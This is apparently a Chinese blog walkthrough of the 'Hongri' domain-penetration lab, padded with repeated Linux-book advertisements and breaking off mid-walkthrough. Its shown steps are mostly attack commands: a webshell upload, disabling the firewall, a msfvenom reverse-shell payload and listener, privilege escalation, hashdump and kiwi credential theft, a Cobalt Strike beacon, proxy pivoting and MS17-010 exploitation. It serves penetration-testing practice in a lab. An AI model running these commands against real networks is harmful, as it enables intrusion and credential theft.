2024年最全内网域渗透总结——红日靶场①_红日靶机账号密码,互联网公司面试流程&面试技巧

最全的Linux教程,Linux从入门到精通

======================

  1. linux从入门到精通(第2版)

  2. Linux系统移植

  3. Linux驱动开发入门与实战

  4. LINUX 系统移植 第2版

  5. Linux开源网络全栈详解 从DPDK到OpenFlow

华为18级工程师呕心沥血撰写3000页Linux学习笔记教程

第一份《Linux从入门到精通》466页

====================

内容简介

====

本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。

华为18级工程师呕心沥血撰写3000页Linux学习笔记教程

本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。

需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以点击这里获取!

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


​![](https://img-blog.csdnimg.cn/4418f2e27bac461886a925b1378c3a99.png)


#### 利用文件上传


​![](https://img-blog.csdnimg.cn/1a199cfd021f4a53b2251e0f1bc96dac.png)


#### 蚁剑连接



#小提一下,马子上传了,不知道马子绝对路径怎么办?
#前面我们不是发现phpstudy文件夹下存在beifen.rar
#猜测应该是yxcms的备份文件
#解压之后,可通过查找acomment.php文件来确定文件上传的路径
#/yxcms/protected/apps/default/view/default



​​![](https://img-blog.csdnimg.cn/0afda1e05b99436fadcbc4599ed3017b.png)


  
 ​



#URl:http://192.168.43.17/yxcms/protected/apps/default/view/default/cmsshell.php


​![](https://img-blog.csdnimg.cn/7e2925bdf5134c08b430b09c4ee41724.png)



至此,已经拿到Webshell


### 三、后渗透


后渗透阶段,当我们已经将小马上传到web服务器上时,可以用webshell管理工具进行下一步渗透了。


#### 蚁剑终端关闭win7防火墙



#关闭win防火墙
netsh advfirewall set allprofiles state off
#查看防火墙配置状态
netsh advfirewall show allprofile state


​![](https://img-blog.csdnimg.cn/686d215a57c84258ba8faab437be21e7.png)


 ![](https://img-blog.csdnimg.cn/bdc81ab7cab141dab1d8c12dd600e062.png)


#### msf生成exe并开启监听



#kali创建后门程序
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.33 LPORT=10888 -f exe -o 233.exe

#蚁剑上传233.exe
#蚁剑终端运行233.exe

#kali开启监听,设置sessions
use exp/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.43.33
set lport 10888
run


​​![](https://img-blog.csdnimg.cn/f7e43b3eab9b44fd835320bf807c0ec4.png)


 ![](https://img-blog.csdnimg.cn/03d1558aa7d34bbab44ff4f7876536e8.png)


#### 拿到win7shell



#尝试提权
#因为是administrator用户,
#所以很容易提权成功。
shell
getuid
getsystem
getuid


​![](https://img-blog.csdnimg.cn/1150e6fa2e794f0281bed123f739ddc6.png)


#### 利用msf进行内网信息收集



chcp 65001 —可解决乱码问题
route print —锁定内网C段
net time /domain —锁定域控192.168.52.138
net user /domain —锁定域内五个账户
ipconfig /all —锁定域名
net view —锁定域内主机
net group “domain admins” /domain —查询域管理员


域名:god.org
域内五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA(win2k8)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143


​![](https://img-blog.csdnimg.cn/ce4b29d1b47b45bf8385d7a239bb066e.png)


​![](https://img-blog.csdnimg.cn/38ab320f01d140718403c46fa4594be0.png)


​![](https://img-blog.csdnimg.cn/d4600bb2030b441fba1321f51e2ef6be.png)


#### hashdump



hashdump —导出本地用户账号密码,该命令的使用需要系统权限。


​![](https://img-blog.csdnimg.cn/46e91bc3031b4ca6b973dcba37e65b51.png)



#CMD5解密
—#hash解密为空:
—#因为当系统为win10或2012R2以上时,
—#默认在内存缓存中禁止保存明文密码,密码字段显示为null,
—#需要修改注册表等用户重新登录后才能成功抓取。


​![](https://img-blog.csdnimg.cn/86d90944e92b479e90dff9f183d47752.png)


#### 抓取域内账密



#利用msf的kiwi模块+system权限
load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用
creds_all #列举所有凭据
creds_kerberos #列举域内账密 Administrator admin@123


​![](https://img-blog.csdnimg.cn/864d559621cc40c8adc69b17acbd5b06.png)


​![](https://img-blog.csdnimg.cn/1716783b7d5f454d940acedd0bce599c.png)


#### CS上线win7



#楼楼用的是tools的CS
#CS的基本使用楼楼就不做多说明了
#kali机作为服务端,本地win11为客户端
#服务端启动
./teamserver 192.168.43.33 123456

这里的ip是服务端ip,后续客户端连接此ip登录

win11:
直接运行runcatcs.vbs即可(仅限windows),
其他系统执行:java -jar cat_client.jar client

#设置监听器
#生成木马–>artifactHRmsf.exe


​![](https://img-blog.csdnimg.cn/5347bb0d754c4e7ca0394b5fa2cc8c7d.png)


​![](https://img-blog.csdnimg.cn/89eae3569f9548b081ad62e248fc359d.png)



#蚁剑上传artfactHRmsf.exe到win7
#运行木马程序
#CS上线成功


​![](https://img-blog.csdnimg.cn/bde0ea88b6ba43b9b04076e0f4e53415.png)



#简单提权
elevate —#提权成功
sleep 1 —#设置回弹时间间隔


​![](https://img-blog.csdnimg.cn/909c1235564e45b7bfa9537260ada696.png)


### 四、横向渗透


为了让 msf 能访问内网的其他主机,即 52 网段的攻击流量都通过已渗透的这台目标主机(Win7)的meterpreter会话来传递,需要建立socks反向代理。


#### socket代理



#添加代理
run autoroute -s 192.168.52.0/24 # 添加内网的路由
run autoroute -p # 查看路由


​![](https://img-blog.csdnimg.cn/29e1240c30504ed59edb6a31d14ba6b5.png)



#开启代理
background #将此会话保存为一个sessions
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9080
set SRVHOST 127.0.0.1
run
jobs #运行后挂起一个job


​![](https://img-blog.csdnimg.cn/688fc3528f014e41bc8b864f56282989.png)



#修改配置文件
#在proxychains的配置文件
vim /etc/proxychains4.conf
#​添加本机的1080端口:
socks4 127.0.0.1 1080
#ping 域内成员


​![](https://img-blog.csdnimg.cn/e6d1313bcc83477faf00c3a88c9c1abb.png)


#### 漏洞扫描



#利用nmap对域内主机进行漏洞扫描
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.143
nmap --script=vuln 192.168.52.138
#发现都存在ms17_010漏洞


​![](https://img-blog.csdnimg.cn/72f338bc264d4b1cb5b5ffa8fc0d280c.png)![](https://img-blog.csdnimg.cn/7e15241c4b1f406ab869216ca0b80697.png)![](https://img-blog.csdnimg.cn/cb92f69dc5204b79bb7d3777b70d1414.png)


#### msf利用ms17-010



search ms17-010
use 2
set RHOST 192.168.52.141/143/138
set COMMAND net user
run
#发现除了win7。win2k3,win2k8都可以利用成功


​![](https://img-blog.csdnimg.cn/52917d5fed3b45ffb3a6a087d752c2bf.png)![](https://img-blog.csdnimg.cn/531b394389ca4311878c88d7984df0de.png)


​win7利用失败


​![](https://img-blog.csdnimg.cn/3f34289e88f54e708741ae60d8c4adf2.png)


#### 尝试给域控win2k8添加管理员



![](https://img-blog.csdnimg.cn/img_convert/9a8cb5f8c0ec69e6499adead0da6e95b.png)


最全的Linux教程,Linux从入门到精通

======================

1.  **linux从入门到精通(第2版)**

2.  **Linux系统移植**

3.  **Linux驱动开发入门与实战**

4.  **LINUX 系统移植 第2版**

5.  **Linux开源网络全栈详解 从DPDK到OpenFlow**



![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/59742364bb1338737fe2d315a9e2ec54.png)



第一份《Linux从入门到精通》466页

====================

内容简介

====

本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第1版出版后曾经多次印刷,并被51CTO读书频道评为“最受读者喜爱的原创IT技术图书奖”。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书附带1张光盘,内容为本书配套多媒体教学视频。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。



![华为18级工程师呕心沥血撰写3000页Linux学习笔记教程](https://img-blog.csdnimg.cn/img_convert/9d4aefb6a92edea27b825e59aa1f2c54.png)



**本书适合广大Linux初中级用户、开源软件爱好者和大专院校的学生阅读,同时也非常适合准备从事Linux平台开发的各类人员。**

> 需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化的资料的朋友,可以点击这里获取!](https://bbs.csdn.net/topics/618542503)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 22
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值